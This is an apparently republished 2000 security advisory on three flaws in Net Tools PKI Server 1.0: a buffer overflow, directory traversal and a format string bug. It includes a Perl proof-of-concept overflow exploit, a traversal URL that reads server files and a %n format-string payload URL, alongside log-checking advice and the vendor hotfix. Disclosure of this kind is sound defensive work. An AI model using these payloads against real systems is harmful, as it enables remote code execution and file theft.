COMMAND
PKI Server
SYSTEMS AFFECTED
Net Tools PKI server 1.0 for NT (including hotfix 1 and 2)
PROBLEM
Following is based on CORE SDI Security Advisory. While
investigating the exploitability of a buffer overflow in the Net
Tools PKI Server from Network Associates Inc. SDI discovered three
new vulnerabilities not fixed by hotfix 1 released to fix problems
reported by Jim Stickley from Garrison Technologies Inc:
http://oliver.efri.hr/~crv/security/bugs/Others/pki.html
Problem #1: Buffer overflow in strong.exe
=========================================
A buffer overflow in the web server component of the Net Tools
PKI server allows a remote attacker to execute arbitrary code as
SYSTEM on the machine running it.
To determine whether anyone has attempted to exploit this
vulnerability, check the enroll-access.log and the
admin-access.log files in the WebServer/logs directory of your
Net Tools PKI Server installation. Search for any log entries
which are excessively long (greater than 500 characters). Each
log entry can then be examined to see the IP address of the
computer that submitted the request.
Remote unauthenticated access to the PKI Server, execution of
arbitrary commands as the user running the enrollment server
(System).
Strong.exe is the web server component of the PKI Server, it
services requests over SSL on ports 443/tcp, 444/tcp and 445/tcp
(default ports). While connections to port 443/tcp require both
client and server autentication using certificates, connections
to port 444/tcp requires no client authentication, therefore any
user with network connectivity to the PKI server can connect via
HTTPS to that port.
The service running on port 443/tcp is called the Administrative
Web Server and its therefore obvious the requirement for mutual
authentication. The service running on port 444/tcp is the
Enrollment Web Server and does not require a client side
certificate by default. Both web servers are actually Virtual
servers serviced by strong.exe
A buffer overflow is present in the function that generates log
data, that allows to overwrite the stack using user supplied data
passed to the server as an URL in the HTTPS request.
https://host:444/<2965 'A' chars>
EAX=66206465 EBX=00F3E1C0 ECX=01FFF224 EDX=20414141
EDI=00000000 EBP=01FFFE60 ESP=01FFF258 EIP = 0040977B
The value in EAX is part of the string (DATE+PATH+FILE+REASON)
that gets logged, detailing the reason for the failure. Since it
is not a valid address, a segmentation fault is rised a few
instructions after the overwrite:
mov ecx,[eax+000000E4]
The above does not overwrite EIP and it kills the server before
its overwritten, but a slight variation of it will let an attacker
overwrite EBP, EIP and by carefully overwriting local variables,
control the execution of arbitrary code on the target machine.
A sample, proof of concept perl script exemplifies this:
#!/usr/bin/perl
# NAI NetTools PKI SERVER 1.0 - Long URL Stack Overflow Exploit
# Replace host and port an create the html file:
#./pkiluso.pl > test.html
#Open the html in a SSL compatible browser and click on the link. puf!
#Juliano Rizzo (c) 2000 juliano@core-sdi.com
$host = "localhost";
$port = "444";
$shell_code= "\x90\x90\x90\x90";
#We can set the values of EIP and EBP, our code is on the stack
#and in 0x01613A2E.
$eip = "\x2E\x3A\x61\x01";#0x01613A2E (URL readed from socket)
#$eip = "\x64\x83\x40%00";#0x00408364 (CALL EBP)
$ebp = "\xCB\xF2\01\x02"; #0x0200F2CB (trunca el string por el 00)
$noplen = (2965 - length($shell_code));
print "<html><body><a href=\"https://".$host.":".$port."/";
print "\x90"x$noplen;
print
$shell_code.$ebp.$eip."\x18\x6B\x62\x01\x18\x6B\x62\x01\x18\x6B\x62\x01".
"\">Click here to exploit.!</a></body></html>";
Problem #2: Directory traversal vulnerability
=============================================
The default installation of Net Tools PKI server allows a remote
attacker to view and download any file residing on the server. To
determine whether anyone has attempted to exploit this
vulnerability, check the enroll-access.log and the
admin-access.log files in the WebServer/logs directory of your Net
Tools PKI Server installation. Search for any log entries
containing "..\" within them. Each log entry can then be examined
to see the IP address of the computer that submitted the request.
Remote unauthenticated access to any file on the PKI server.
By specifying '..\' in HTTPS requests to the enrollment server,
an attacker can navigate the server's file system and
view/download any file if its name is known. By default the
enrollment server uses
\Program Files\Network Associates\Net Tools PKI Server\WebServer\enroll-server
as the Web Root directory, if a file name is known (ie.
autoexec.bat) the attacker just needs to supply the remaining path
components to access it:
https://host:444/..\..\..\..\..\autoexec.bat
will display the contents of the file in the browser. If a
filename is not known, the web server will reveal its web root
directory in an error messages shown to the client:
https://host:444..\..\pirulo.pdf will result in:
File Not Found
The requested URL /..\..\pirulo.pdf was not found on this server.
There was also some additional information available about the
error:
[Tue Jun 27 19:47:33 2000] access to C:\Program Files\Network Associates\Net Tools PKI Server\WebServer\enroll-server/..\..\pirulo.pdf failed for a.b.c.d, reason: File does not exist
Problem #3: Format strings with user supplied data
==================================================
The Net Tools PKI Server fail to validate properly the data passed
as arguments to the server's logging routines and allows a remote
attacker to execute arbitary code as SYSTEM on the machine running
it.
Remote unauthenticated access to the PKI Server, execution of
arbitrary commands as the user running the enrollment server
(System).
The user supplied URL is processed by Strong.exe and if the .XUDA
extension is found, the request is forwarded to XUDAD.EXE for
futher processing. Prior to this "hand-off" the URL string is
parsed, filtered for metacharacters and passed to a function that
logs the request. Somewhere along the processing path, the user
supplied data becomes the format string for a formatted output
function similar to the ANSI C sprintf(). This allows a remote
attacker to provide data that will force that function into
overwritting arbitrary portions of the process memory and cause
either a denial of service attack or the execution of arbittrary
code. To exemplify this, the following URL will cause a DoS:
https://host:444/%25%25s.xuda
Notice that the hex value 0x25 represent the ASCII character '%',
thus the URL string will get converted to "%%s.xuda" and
subsequentelly to "%s.xuda". A more elaborated attack, might try
to overwrite the return address on the stack to force the server
into executing arbitrary code. Proof of concept, sample URL:
https://host:444/xxx%3c%b9%ff%01%25%25x%25%25x%25%25x%25%25x%25%25x%25%25x%25%25x%25%25x%25%25x%25%25x%25%25x%25%25x%25%25x%25%25x%25%25x%25%25x%25%25x%25%25x%25%25x%25%25x%25%25x%25%25x%25%25x%25%25x%25%25x%25%25x%25%25x%25%25x%25%25x%25%25x%25%25x%25%25x%25%25x%25%25x%25%25x%25%25x%25%25x%25x%25n.xuda
SOLUTION
Network Associates Inc. has released Hotfix 3 for the Net Tools
PKI Server. It corrects the three problems. It can be obtained
from:
http://www.nai.com/asp_set/download/upgrade/find.asp
Or contact Network Associates Technical support at 1-800-722-3709.